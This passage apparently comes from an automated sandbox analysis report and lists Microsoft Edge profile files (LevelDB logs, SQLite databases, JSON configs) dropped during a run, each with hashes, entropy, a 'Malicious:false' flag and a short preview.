                                                                                                                                                                                                                                                                                          MD5:20C77C796E1565A2D1A44CB514D572E7
                                                                                                                                                                                                                                                                                          SHA1:5837E30193CA642185B4DB9157A2643DDF5625FC
                                                                                                                                                                                                                                                                                          SHA-256:3C29D2AF603269A9D587041817A8B4E281932389855F2E0306C6CF30A174D1D4
                                                                                                                                                                                                                                                                                          SHA-512:E9E3B0AE76A8B5125EC0F89D318052DC2E551761292BE0715744A8ACD2A41417BC0084A5AC8572496743CB0D006CE0FB32B8C17005BC3D5322E9EBBC7DAD895B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.097 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/30-09:55:29.098 8ec Recovering log #3.2024/12/30-09:55:29.099 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1943063119366455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bcDj3+q2PqLTwi23oH+TcwtpIFUt8Mbckd532WZmw+Mbc1VkwOqLTwi23oH+TcM:qDz+v8wZYebmFUt8PpW/+P1V5TwZYeb7
                                                                                                                                                                                                                                                                                          MD5:20C77C796E1565A2D1A44CB514D572E7
                                                                                                                                                                                                                                                                                          SHA1:5837E30193CA642185B4DB9157A2643DDF5625FC
                                                                                                                                                                                                                                                                                          SHA-256:3C29D2AF603269A9D587041817A8B4E281932389855F2E0306C6CF30A174D1D4
                                                                                                                                                                                                                                                                                          SHA-512:E9E3B0AE76A8B5125EC0F89D318052DC2E551761292BE0715744A8ACD2A41417BC0084A5AC8572496743CB0D006CE0FB32B8C17005BC3D5322E9EBBC7DAD895B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.097 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/30-09:55:29.098 8ec Recovering log #3.2024/12/30-09:55:29.099 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2658184469363398
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:KrJ/2qOB1nxCkM8SAELyKOMq+8ETZKoxAXCVum28:K0q+n0J89ELyKOMq+8ET8cUV8
                                                                                                                                                                                                                                                                                          MD5:DF29069D27197D4616C3E55AF460A04F
                                                                                                                                                                                                                                                                                          SHA1:2925821CE2561784300D9201027F584B53BA53B3
                                                                                                                                                                                                                                                                                          SHA-256:093D2160FF3BF9A4204430032C5FEBF22CDA497114F9EB3AA461858429B2EA34
                                                                                                                                                                                                                                                                                          SHA-512:B5950B50D851DF2F65F610BF5A55FEB218EA08C954ECC0D8090CD94D6349E9CA9F17EB1C5F5B716E36CAA4333325FA097E1105FC2FE30C2D4A3ACBAE2C637A12
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.46728611972896145
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB02QWV:v7doKsKuKZKlZNmu46yjx0XWV
                                                                                                                                                                                                                                                                                          MD5:C3C92ABE02432E5E8AEF7A08A9CE3921
                                                                                                                                                                                                                                                                                          SHA1:2E4A2C9CA9DD6664D0C4C9E473A0BE805E42C724
                                                                                                                                                                                                                                                                                          SHA-256:1D8C65D91CE9EA61B38CF69FEF05AF6DAC1DC6FB49AC0D1375BF37E9E5440D86
                                                                                                                                                                                                                                                                                          SHA-512:F8E4CF5C849E0CBA33AFB4D73112915C4637D38E383DA5D2652529541FF9836A22C2A035531EB244C25414BEAB0CE784C987A029617DA76ED226E755B83F8DB9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.10268835980117919
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:+shVshispEjVl/PnnnnnnnnnnnvoQ/Eou:+shVsh/oPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                          MD5:82DB37DAB761084AC4FA506E47724F3F
                                                                                                                                                                                                                                                                                          SHA1:331214F45E7F2F87D2B7354F6198364F2B7144FC
                                                                                                                                                                                                                                                                                          SHA-256:4A0F6C5772FE0EB7D42A26A5EB902466280AB1A0BE7A629625B9CC6A705377E7
                                                                                                                                                                                                                                                                                          SHA-512:4B901443931413DEC6FA087C0D3C0E861C6D8FA6248E7EBC3277B87F9A82FE17A41473E35B1B539A4265FE9727D5EFD4340BA2D8AD5D0A53993A5D708AEC2414
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..-.............M........<.B.l.F{.....hik.N.y....-.............M........<.B.l.F{.....hik.N.y..........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8892352811524996
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:mEDRHtVINUWHCQ/k9apK36MfDiaRw/yZf1oY/v8zhWYyvyIPymyBHyNxyf7:op8DvMEDe
                                                                                                                                                                                                                                                                                          MD5:08CC017A9609036E277A26F3785D3C96
                                                                                                                                                                                                                                                                                          SHA1:ECD2169BA8E1EF1EA033B0E2E33C1E4CE8060DD0
                                                                                                                                                                                                                                                                                          SHA-256:3E658B10D8B1185E7986072C773AD4CC8C21753EC7CC190C1FD55236EE0EB39D
                                                                                                                                                                                                                                                                                          SHA-512:55BA3BC9D6EA3CBBD8A7A2A4609EED9CD55F2C676351283BFC989C4D9100B41D2D12FC5905013D3DE3F77C5451CB4D8F9DD8ECE41294B2C8B834FAE36D7DC8CD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:7....-..........F{.....hn.~Y.C,.........F{.....h./......SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):485
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.026547274585294
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:/XntM+4il3sedhOeAyOuuuuuuuuuuklkBillKtpE3PsedhOA:hlc8JAyOuuuuuuuuuuk+UllKoE8h
                                                                                                                                                                                                                                                                                          MD5:5863DDFE575209F133B88E04FA30DFEF
                                                                                                                                                                                                                                                                                          SHA1:9070DD0B8853D7950FF9B01C9C5420BEAC5E7507
                                                                                                                                                                                                                                                                                          SHA-256:FA1A11F7B7E47CB10045275E6045969B67CCB6DC2EE8DE32C1563F50D2AFDCA3
                                                                                                                                                                                                                                                                                          SHA-512:934252BE424B8C87ABBE2763E88EBF3FBCA22698425B25E5C7B46E85E29CFE56660CA4059117FB3D8F5D9FC778004D859A3F55C981D3EE6AFCE0DB33E0ED8638
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:A..r.................20_1_1...1.,U.................20_1_1...1.9.0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................\.;...............#38_h.......6.Z..W.F......Ei......Ei.........V.e................V.e................j8h.0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.238146532395916
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bUaKVq2PqLTwi23oH+TcwtfrK+IFUt8MbUXegZmw+MbUmIkwOqLTwi23oH+Tcwf:ilVv8wZYeb23FUt8HOg/+HmI5TwZYeb5
                                                                                                                                                                                                                                                                                          MD5:A4596BD19B412D47D2F916CCA562D8D9
                                                                                                                                                                                                                                                                                          SHA1:01B20270D0F0C767CDE9815B1575B5156BC94C6D
                                                                                                                                                                                                                                                                                          SHA-256:0BB0C8BA10E746CFBB270BBF8ED90B167A65A697A72303631E20E1E0F170091B
                                                                                                                                                                                                                                                                                          SHA-512:8FF03A781B7FB04453A9797A2CB9D2A87119402B1DBC1B0A18961808C409F44933237F693804D73EC050B15AB5F3CF56B3AE263CAC1AD294260CCE49D52C07CC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.838 d84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/30-09:55:29.839 d84 Recovering log #3.2024/12/30-09:55:29.840 d84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.238146532395916
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bUaKVq2PqLTwi23oH+TcwtfrK+IFUt8MbUXegZmw+MbUmIkwOqLTwi23oH+Tcwf:ilVv8wZYeb23FUt8HOg/+HmI5TwZYeb5
                                                                                                                                                                                                                                                                                          MD5:A4596BD19B412D47D2F916CCA562D8D9
                                                                                                                                                                                                                                                                                          SHA1:01B20270D0F0C767CDE9815B1575B5156BC94C6D
                                                                                                                                                                                                                                                                                          SHA-256:0BB0C8BA10E746CFBB270BBF8ED90B167A65A697A72303631E20E1E0F170091B
                                                                                                                                                                                                                                                                                          SHA-512:8FF03A781B7FB04453A9797A2CB9D2A87119402B1DBC1B0A18961808C409F44933237F693804D73EC050B15AB5F3CF56B3AE263CAC1AD294260CCE49D52C07CC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.838 d84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/30-09:55:29.839 d84 Recovering log #3.2024/12/30-09:55:29.840 d84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):753
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                                          MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                                          SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                                          SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                                          SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):335
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.205526533480201
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bUMFdj3+q2PqLTwi23oH+TcwtfrzAdIFUt8MbU1N2WZmw+MbU1N9VkwOqLTwi2a:iMz+v8wZYeb9FUt8HP2W/+HP9V5TwZY/
                                                                                                                                                                                                                                                                                          MD5:17609A1C491D5A2644D5C42207D2E8B0
                                                                                                                                                                                                                                                                                          SHA1:702B74AA0EB862B30278FC09AD0783C5A9F140B9
                                                                                                                                                                                                                                                                                          SHA-256:CEAB5A847081A4DC1B5C15BAEBC7228F2E26F825A697225CB6BD700FD9C86592
                                                                                                                                                                                                                                                                                          SHA-512:7886734062D60A305D7E562487CFE2BFAB585337F2AA22385A675A322EA037F8A96877C50B151E75C8EA1D7B274268E395CD05076022895A27A15429AD4A0C41
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.810 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/30-09:55:29.811 8ec Recovering log #3.2024/12/30-09:55:29.811 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):335
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.205526533480201
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bUMFdj3+q2PqLTwi23oH+TcwtfrzAdIFUt8MbU1N2WZmw+MbU1N9VkwOqLTwi2a:iMz+v8wZYeb9FUt8HP2W/+HP9V5TwZY/
                                                                                                                                                                                                                                                                                          MD5:17609A1C491D5A2644D5C42207D2E8B0
                                                                                                                                                                                                                                                                                          SHA1:702B74AA0EB862B30278FC09AD0783C5A9F140B9
                                                                                                                                                                                                                                                                                          SHA-256:CEAB5A847081A4DC1B5C15BAEBC7228F2E26F825A697225CB6BD700FD9C86592
                                                                                                                                                                                                                                                                                          SHA-512:7886734062D60A305D7E562487CFE2BFAB585337F2AA22385A675A322EA037F8A96877C50B151E75C8EA1D7B274268E395CD05076022895A27A15429AD4A0C41
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.810 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/30-09:55:29.811 8ec Recovering log #3.2024/12/30-09:55:29.811 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
